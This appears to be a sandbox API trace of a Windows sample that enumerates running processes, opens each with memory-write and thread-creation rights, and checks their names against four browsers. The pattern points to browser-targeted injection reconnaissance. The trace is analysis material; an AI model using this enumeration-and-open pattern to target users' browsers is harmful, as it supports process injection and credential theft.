	[0215.846] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0215.847] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0215.847] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0215.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4628
	[0215.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.848] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0215.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.849] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.849] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0215.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.849] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.849] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0215.850] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x462c
	[0215.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.850] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0215.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.850] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.851] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0215.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.851] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.851] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0215.852] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4630
	[0215.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.852] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0215.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.852] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.853] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0215.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.853] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.853] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0215.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4634
	[0215.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.854] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0215.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.854] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.855] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0215.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.855] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.855] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0215.856] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4638
	[0215.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.856] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0215.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.856] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.856] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0215.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.857] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.857] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0215.858] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x463c
	[0215.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.858] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0215.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.859] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.859] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0215.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.859] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.859] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0215.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4640
	[0215.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.860] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0215.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.861] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.861] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0215.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.861] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.861] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0215.862] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4644
	[0215.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.862] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0215.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.862] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.863] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0215.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.863] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.863] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.864] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4648
	[0215.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.864] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.864] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.865] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.865] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.865] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.866] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x464c
	[0215.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.867] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.867] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.867] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.868] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.868] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4650
	[0215.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.869] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.869] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.869] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.870] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.870] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4654
	[0215.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.871] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.871] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.871] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.871] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.872] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4658
	[0215.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.872] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.873] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.873] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.874] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.874] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x465c
	[0215.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.875] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.875] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.875] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.876] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.876] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.876] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4660
	[0215.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.877] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.877] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.877] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.878] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.878] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0215.878] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4664
	[0215.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.879] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0215.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.879] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.879] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0215.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.880] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.880] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.880] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4668
	[0215.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.881] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.881] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.881] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.881] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.882] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0215.882] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x466c
	[0215.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.882] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.883] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.883] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.883] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.884] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0215.884] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4670
	[0215.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.884] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0215.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.885] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.885] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0215.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.885] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.886] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.886] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4674
	[0215.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.886] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.887] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.887] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.887] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.887] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0215.888] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4678
	[0215.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.888] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0215.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.889] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.889] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0215.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.889] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.890] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0215.890] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x467c
	[0215.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.891] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0215.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.891] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.891] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0215.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.891] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.892] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0215.892] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4680
	[0215.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.892] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0215.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.893] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.893] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0215.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.893] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.893] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0215.894] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4684
	[0215.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.894] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0215.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.895] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.895] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0215.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.895] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.895] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0215.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
